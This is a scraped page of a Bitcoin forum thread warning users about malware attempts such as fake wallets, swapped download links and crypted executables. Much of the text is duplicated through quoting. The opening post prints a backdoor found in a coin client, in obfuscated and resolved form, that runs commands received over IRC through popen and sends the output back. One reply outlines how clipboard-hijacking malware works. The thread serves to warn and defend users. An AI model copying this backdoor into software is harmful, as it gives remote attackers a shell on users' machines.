Topic: Beware of Increasingly Sophisticated Malware Infection Attempts - page 42. (Read 834878 times)
January 19, 2017, 01:18:42 PM
Beware of links sent to your PM box, even ones that look like a link to a thread on the forum.
December 29, 2016, 05:50:30 PM
is there any good anti virus to handle it??
December 27, 2016, 04:34:23 PM
If i use antymalwarebytes i can be protected?
December 08, 2016, 12:36:23 AM
Useful thread.. I always use sandboxie and shado defender before installing or running any new program now a days.. . And mediam level of hackers fears of virustotal because they send the file for further analysis(as what i've heard) and their FUD malware loose its FUD ability. So my suggestion will be... Use sandboxie or any similar software and still use softwares like shadow defender for any kind of new programs... . And before doing any thing just scan it in virustotal if you can.
Note: just don't trust any new person or software just like that.
In between the user(shsfhs) above me just quoted the original thread and no reply (seems like a new botter in town).
Note: just don't trust any new person or software just like that.
In between the user(shsfhs) above me just quoted the original thread and no reply (seems like a new botter in town).
September 08, 2016, 06:50:59 AM
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.
"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.
Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).
Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.
Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.
Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.
Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.
Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).
Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.
Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.
Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.
Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
September 05, 2016, 04:57:22 AM
i was infected with virus lol
September 04, 2016, 09:03:22 AM
Could you List the différent scam
September 01, 2016, 10:48:48 PM
Speaking of antivirus can the results from AV-TEST be trusted?
Is it impartial? do they do proper testing or just surface easy stuff?
Is it impartial? do they do proper testing or just surface easy stuff?
use www.virustotal.com to scan small files (like wallets) it uses +/- 50 AV engines to scan, it's prolly faster than using your onboard AV
- BUT remember, serious hackers will have no problem hiding their payload
August 13, 2016, 03:11:04 PM
Speaking of antivirus can the results from AV-TEST be trusted?
Is it impartial? do they do proper testing or just surface easy stuff?
Is it impartial? do they do proper testing or just surface easy stuff?
August 10, 2016, 09:56:05 PM
Thank you for this warning, (i said with 30 trojan horse viruses attacking me at the same time)
August 02, 2016, 10:48:15 AM
Case in point.. The NAV dev didn't like this line of questioning .. 
Quote from: Bitcoin Forum
A reply of yours, quoted below, was deleted by the starter of a self-moderated topic. There are no rules of self-moderation, so this deletion cannot be appealed. Do not continue posting in this topic if the topic-starter has requested that you leave.
You can create a new topic if you are unsatisfied with this one. If the topic-starter is scamming, post about it in Scam Accusations.
You can create a new topic if you are unsatisfied with this one. If the topic-starter is scamming, post about it in Scam Accusations.
Quote
How much of your personal information is this app accessing/sharing ?
Why does it smell phishy in here !?
Why does it smell phishy in here !?
August 02, 2016, 12:06:32 AM
An infected coin daemon can rob a whole exchange.. It happened to Cryptsy.
https://bitcointalk.org/index.php?topic=1328521.0;all
https://bitcointalk.org/index.php?topic=1328521.0;all
Read and/or research much ?
It was an inside job.
https://bitcointalksearch.org/topic/cryptsy-stopping-withdraw-locking-accounts-without-notifying-users-class-action-1173703
That aside, people will someday know them as one of, if not, the main source of crypto related malware.
August 01, 2016, 02:59:11 PM
An infected coin daemon can rob a whole exchange.. It happened to Cryptsy.
https://bitcointalk.org/index.php?topic=1328521.0;all
https://bitcointalk.org/index.php?topic=1328521.0;all
gr8 post dude quoted you
ya, been using keepass for a while, a unique and complex pswd for every account is a must nowadays
pm an addy if you' like 2b tipp'd some TALK
ya, been using keepass for a while, a unique and complex pswd for every account is a must nowadays
pm an addy if you' like 2b tipp'd some TALK
services are catching up, but that means that the hacks will catch up too, i foresee with apps and security like 2fa and all the mobile wallets that a smartphone will be the only thing a person carries not too long from now, wallets in the phone, passwords in the phone, 2fa, and finally personal identification and voila, everything in the smartphone
THEN, the thieves and hackers only need to steal one thing to own you, YOUR PHONE, lol
Or maybe call Verizon and have them change your phone to them.
Hmm this is a problem in the community if only there was an Bitcoin antivirus... :p but seriously this is a problem that needs to be fixed
There are several bitcoin viruses...
there are none within the chain, but there are many that sit in the pc and when you copy/paste your address, they choose from a list and copy and paste an address that looks like yours, but is really one from an hierarchal wallet belonging to someone else. that way when you think you are sending BTC to your wallet, your are really using one of theirs....pretty easy stuff to write, the hardest part would be to search the list without delaying too much, changing the contents of the clipboard is easy, checking to see if it is a bitcoin address could be tricky to pull off, but not really hard, simply starting with the number of characters and then if that matches checking for the absence of spaces, checking the first two characters against a list and going from there, pretty junior high school stuff
Wow that sounds simple and yet all feel really possible. Well I have to say it's not just as a "possible" hypothetical thing going on. How you said it, it's actually happening right now as we speak. Guess one thing you can do to be safe is dont go public with sites you are to show a very personal picture of you.
Hmm this is a problem in the community if only there was an Bitcoin antivirus... :p but seriously this is a problem that needs to be fixed
There are several bitcoin viruses...
there are none within the chain, but there are many that sit in the pc and when you copy/paste your address, they choose from a list and copy and paste an address that looks like yours, but is really one from an hierarchal wallet belonging to someone else. that way when you think you are sending BTC to your wallet, your are really using one of theirs....pretty easy stuff to write, the hardest part would be to search the list without delaying too much, changing the contents of the clipboard is easy, checking to see if it is a bitcoin address could be tricky to pull off, but not really hard, simply starting with the number of characters and then if that matches checking for the absence of spaces, checking the first two characters against a list and going from there, pretty junior high school stuff
wtf are these noobs? with 0 activity just saying the same sh** over and over? lollll.
Every one should know that never use passwords for emails and other accounts on many other sites. this is just logic.
Every one should know that never use passwords for emails and other accounts on many other sites. this is just logic.
while what you say is more than true, it is done everyday over and over because most people are more lazy than they are smart....and that is something that every thief can count on to change from now until the end of time. and that applies to each and every person to some degree. anyone that disagrees would lock their car door each and every time they leave the car. the most common excuse would be that they are not parking in a bad place or whatever, it is still an excuse and i don't lock the doors on the car that often either, but i won't make excuses, i am too damned lazy to lock/unlock the door each and every time...
but when it comes to financial security, i sure as hell dot the i's and cross the t's
wtf are these noobs? with 0 activity just saying the same sh** over and over? lollll.
Every one should know that never use passwords for emails and other accounts on many other sites. this is just logic.
Every one should know that never use passwords for emails and other accounts on many other sites. this is just logic.
gr8 post dude quoted you
ya, been using keepass for a while, a unique and complex pswd for every account is a must nowadays
pm an addy if you' like 2b tipp'd some TALK
ya, been using keepass for a while, a unique and complex pswd for every account is a must nowadays
pm an addy if you' like 2b tipp'd some TALK
services are catching up, but that means that the hacks will catch up too, i foresee with apps and security like 2fa and all the mobile wallets that a smartphone will be the only thing a person carries not too long from now, wallets in the phone, passwords in the phone, 2fa, and finally personal identification and voila, everything in the smartphone
THEN, the thieves and hackers only need to steal one thing to own you, YOUR PHONE, lol
gr8 post dude quoted you
ya, been using keepass for a while, a unique and complex pswd for every account is a must nowadays
pm an addy if you' like 2b tipp'd some TALK
ya, been using keepass for a while, a unique and complex pswd for every account is a must nowadays
pm an addy if you' like 2b tipp'd some TALK
Jump to: